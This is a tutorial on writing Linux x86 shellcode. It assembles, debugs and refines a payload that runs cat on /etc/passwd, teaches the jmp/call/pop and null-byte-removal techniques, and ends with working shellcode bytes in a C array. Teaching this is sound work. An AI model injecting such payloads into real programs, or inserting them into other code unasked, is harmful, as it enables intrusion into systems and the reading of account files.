Most of the programs we use every day contain bugs. A bug is a flaw in a program that can make it behave in unintended ways or fail. Bugs with security implications are called vulnerabilities, and they can be exploited by writing code that is usually called an exploit. The most common vulnerabilities involve memory corruption, such as buffer overflows, heap overflows, race conditions, format string attacks, and so on. In this article we won't learn to write an exploit, nor will we see how to search for vulnerabilities in software; instead we will see how to write and analyze shellcode, and how it relates to the above.
Shellcode is generally regarded as a program that starts a shell, and it is used as the payload of an exploit. In reality, shellcode can do anything a normal program can do. It is executed after the vulnerability has been exploited.
In this article, we will analyze and write shellcode for Linux x86 32-bit architectures.
I specify the architecture because shellcode is usually written in assembly language, and each processor family has its own instruction set. In addition, each operating system has its own system calls for requesting services from the kernel.
On 32-bit Linux, a system call is made with the int 0x80 instruction; the kernel then reads the EAX register to get the number of the requested system call. Each system call is identified by a unique number that the kernel recognizes. The arguments are passed in EBX, ECX, EDX and so on, in that order.
Let's look at the system calls in Linux. On Ubuntu, they are listed in the following file:
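To see that system calls really are selected by number, here is a minimal C sketch that uses the libc syscall() function together with the SYS_* constants from <sys/syscall.h>. The helper names getpid_by_number and execve_number are made up for this illustration. Keep in mind that the numbers depend on the architecture: execve is 11 on 32-bit x86, but a 64-bit build will report a different value.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>   /* SYS_getpid, SYS_execve and the other SYS_* numbers */
#include <unistd.h>        /* syscall(), getpid() */

/* Hypothetical helper: invoke getpid through its system call number
   instead of through the usual libc wrapper. */
static long getpid_by_number(void)
{
    return syscall(SYS_getpid);
}

/* Hypothetical helper: the number that identifies execve on the
   architecture this file is compiled for (11 on 32-bit x86). */
static long execve_number(void)
{
    return SYS_execve;
}
```

Calling getpid_by_number() should give the same result as the ordinary getpid() wrapper, since both end up requesting the same numbered service from the kernel.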
It’s time to start!
Let's write our first shellcode. I have chosen a fairly simple one, to make it easier to follow the steps needed to analyze and optimize it. We want shellcode that uses the "cat" command to display the contents of /etc/passwd (this file contains information about the system's accounts).
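; /bin/cat /etc/passwd
section .data
cmd  db '/bin/cat', 0
file db '/etc//passwd', 0    ; null-terminated, like cmd

section .text
global _start

_start:
    ; execve("/bin/cat", ["/bin/cat", "/etc//passwd"], NULL)
    mov eax, 11       ; system call number of execve
    mov edx, 0        ; third argument: NULL
    mov ebx, cmd      ; first argument: address of "/bin/cat"
    push edx          ; null pointer that terminates the array
    mov ecx, file
    push ecx          ; address of "/etc//passwd"
    push ebx          ; address of "/bin/cat"
    mov ecx, esp      ; second argument: address of the array
    int 80h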
To assemble and run the program, and so view the contents of /etc/passwd, use the following commands (on a 64-bit host, ld typically also needs the option -m elf_i386):
$ nasm -f elf shellcode00.asm
$ ld -o shellcode00 shellcode00.o
$ ./shellcode00
As expected, the program shows the contents of the passwd file. Now look at what we have written: the code consists of a ".data" section and a ".text" section. The data section holds the declarations of the variables cmd and file, and the text section holds the code needed to run the command "cat /etc/passwd". In particular, it uses the execve system call, which Linux uses to execute a program. The first argument is a pointer to the string "/bin/cat", the program to execute. The second argument is a pointer to the argument array: it holds the program name "/bin/cat" and the argument "/etc//passwd", and it must be terminated by a 32-bit null pointer. The third and final argument, the environment, is left empty (NULL).
The first instruction we meet is "mov eax, 11"; 11 is the system call number of execve.
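The same call can be written in C, which may make the layout of the three arguments easier to see. This is only a sketch: the function name cat_file is hypothetical, and the fork/waitpid wrapper is an addition that the assembly version does not have (it is there so the caller survives the execve and can read the exit status).

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run "/bin/cat <file>" in a child process.
   Returns the exit status of cat, or -1 if the child could not be
   created or did not exit normally. */
static int cat_file(const char *file)
{
    /* Argument array: program name, one argument, then the null
       pointer that terminates the array. */
    char *const argv[] = { "/bin/cat", (char *)file, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* The same three arguments the assembly loads into ebx, ecx and edx */
        execve("/bin/cat", argv, NULL);
        _exit(127);            /* reached only if execve failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

For example, cat_file("/etc//passwd") prints the file and returns the exit status of cat; the doubled slash is harmless, since the kernel treats it as a single separator.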
We now start debugging with gdb.
Now we step through the program up to the instruction "mov ecx, esp" and examine the registers ebx and ecx:
Note that ebx contains the address of the string "/bin/cat", while ecx contains the address of the string "/etc//passwd". Let's also take a look at the stack:
As the stack shows, after the instruction "mov ecx, esp" the ecx register points to the array holding the addresses of "/bin/cat" and "/etc//passwd".
The code we've written has some major problems. The first is the data segment: as you might guess, once shellcode has been injected into a running program it cannot rely on variables sitting at fixed addresses, so the code must be independent of its position in memory to run correctly. The next step is therefore to remove the data segment. To do this, we use the following instructions:
    jmp end
start:
    pop ecx
end:
    call start
    db '/etc//passwd'
This method solves the problem by placing the string immediately after the call instruction. When call executes, it pushes its return address, which is the address of the string, onto the stack; the pop instruction then takes that address off the stack and places it in a register, in our case ecx.
With this in mind, we change the code (in a new file, shellcode01.asm) as shown below:
BITS 32
    jmp end
start:
    ; execve("/bin/cat", ["/bin/cat", "/etc//passwd"], NULL)
    pop ecx
    mov eax, 11
    mov edx, 0
    push 0
    push dword 0x7461632f
    push dword 0x6e69622f
    mov ebx, esp
    push edx
    push ecx
    push ebx
    mov ecx, esp
    int 80h
end:
    call start
    db '/etc//passwd'
BITS 32 tells nasm to generate 32-bit code. Note that I decided to build the string "/bin/cat" on the stack with the instructions:
    push dword 0x7461632f ; /cat
    push dword 0x6e69622f ; /bin
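The two constants are simply the characters of the string packed four at a time. Because x86 is little-endian, the first character of each group ends up in the lowest byte of the value, and because the stack grows downward, "/cat" is pushed before "/bin". A small C sketch of the packing follows; the name pack_dword is made up for this example.

```c
#include <stdint.h>

/* Hypothetical helper: pack exactly four characters into the 32-bit
   immediate that "push dword" needs so that the bytes land in memory
   in string order. The first character becomes the lowest byte. */
static uint32_t pack_dword(const char chunk[4])
{
    return  (uint32_t)(unsigned char)chunk[0]
         | ((uint32_t)(unsigned char)chunk[1] << 8)
         | ((uint32_t)(unsigned char)chunk[2] << 16)
         | ((uint32_t)(unsigned char)chunk[3] << 24);
}
```

With this helper, pack_dword("/cat") gives 0x7461632f and pack_dword("/bin") gives 0x6e69622f, the two values used in the push instructions.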
Then run the program under gdb up to the instruction "mov ecx, esp".
At that point esp points to the addresses of the strings "/bin/cat" and "/etc//passwd"; after the instruction "mov ecx, esp", the ecx register holds exactly the second argument of the execve function.
Let us now turn to the second problem, null bytes. Shellcode is often copied into the target as a C string, so a null byte would cut it short. We therefore examine the disassembly of the binary file to see whether our code contains any:
As you can see, there are null bytes in the following lines:
8048063: b8 0b 00 00 00    mov $0xb,%eax
8048068: ba 00 00 00 00    mov $0x0,%edx
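This is because eax and edx are 32-bit registers, so the immediate value is encoded in four bytes even though a single byte would be enough for the operation. Using the 8-bit registers al and dl, which are the least significant bytes of eax and edx, shortens the immediate to one byte:
8048069: b0 0b    mov $0xb,%al
804806b: b2 00    mov $0x0,%dl
The mov into al no longer contains a null byte. The mov into dl still does, because its immediate is itself zero; it is also unnecessary once edx has been cleared. Before writing to the 8-bit registers, then, you have to clear the full registers, and the "xor" instruction does this safely: xor-ing a register with itself sets it to zero and is encoded without null bytes (it does modify the processor flags, which does not matter here).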
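Looking for null bytes by eye becomes tedious as the code grows, so the check can be automated. The following C sketch scans a buffer of machine code for the first null byte; first_null_byte and the three array names are hypothetical, and the sample bytes are the encodings of "mov eax, 11", "mov al, 11" and "xor edx, edx".

```c
#include <stddef.h>

/* Hypothetical helper: return the index of the first 0x00 byte in
   buf, or -1 if the buffer contains none. */
static long first_null_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* 32-bit immediate: three of the four immediate bytes are zero */
static const unsigned char mov_eax_11[]  = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };
/* 8-bit immediate: no padding bytes */
static const unsigned char mov_al_11[]   = { 0xb0, 0x0b };
/* Register cleared without any immediate at all */
static const unsigned char xor_edx_edx[] = { 0x31, 0xd2 };
```

Here first_null_byte reports index 2 for mov_eax_11 and -1 for the other two encodings.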
Here is the complete code (in a new file, shellcode02.asm):
BITS 32
    jmp end
start:
    ; execve("/bin/cat", ["/bin/cat", "/etc//passwd"], NULL)
    pop ecx
    xor eax, eax
    xor edx, edx          ; edx is now zero, so no "mov dl, 0" is needed
                          ; (it would assemble to b2 00, a null byte)
    xor ebx, ebx
    mov al, 11
    push ebx              ; null dword that terminates "/bin/cat"
    push dword 0x7461632f
    push dword 0x6e69622f
    mov ebx, esp
    push edx
    push ecx
    push ebx
    mov ecx, esp
    int 80h
end:
    call start
    db '/etc//passwd'
Finally, assemble and link the code, then disassemble it (for example with objdump) to list the instructions with their corresponding opcodes:
$ nasm -f elf shellcode02.asm
$ ld -o shellcode02 shellcode02.o
$ objdump -d shellcode02
We can then write our shellcode in the form we are used to seeing, as shown below:
char shellcode[] =
    "\xeb\x1d\x59\x31\xc0\x31\xd2\x31\xdb\xb0\x0b"
    "\x53\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3"
    "\x52\x51\x53\x89\xe1\xcd\x80\xe8\xde\xff\xff\xff\x2f"
    "\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";
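One detail is easy to miss: the path at the end of the shellcode has no terminator of its own in the assembly source. In the C form it still works because the compiler appends a null byte to every string literal. The sketch below checks this on the last twelve bytes of the shellcode; path_bytes, literal_length and has_implicit_terminator are names invented for the illustration.

```c
#include <stddef.h>
#include <string.h>

/* The last twelve bytes of the shellcode: the path string, written
   without an explicit terminator. */
static const char path_bytes[] =
    "\x2f\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";

/* Number of bytes written in the literal, not counting the null byte
   that the compiler adds. */
static size_t literal_length(void)
{
    return sizeof path_bytes - 1;
}

/* Nonzero when the compiler-supplied null byte follows the last
   written byte. */
static int has_implicit_terminator(void)
{
    return path_bytes[sizeof path_bytes - 1] == '\0';
}
```

This guarantee only holds while the bytes live in a C string literal. Once the shellcode is injected elsewhere, the byte after the path is whatever happens to be in memory, so the string is correctly terminated only if that byte is zero.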
At this point we have a fully functional piece of shellcode that prints the contents of /etc/passwd.
As we have seen, assembly language is at the heart of effective and efficient shellcode. Shellcode is therefore often created to target one specific combination of processor, operating system and service pack, called a platform. For some exploits, the constraints that the target process places on the shellcode mean that very specific shellcode must be created. However, it is not impossible for one shellcode to work across multiple exploits, service packs, operating systems and even processors.
Therefore, if you are familiar with assembly language and the architecture of operating systems, there is no barrier to limit your imagination.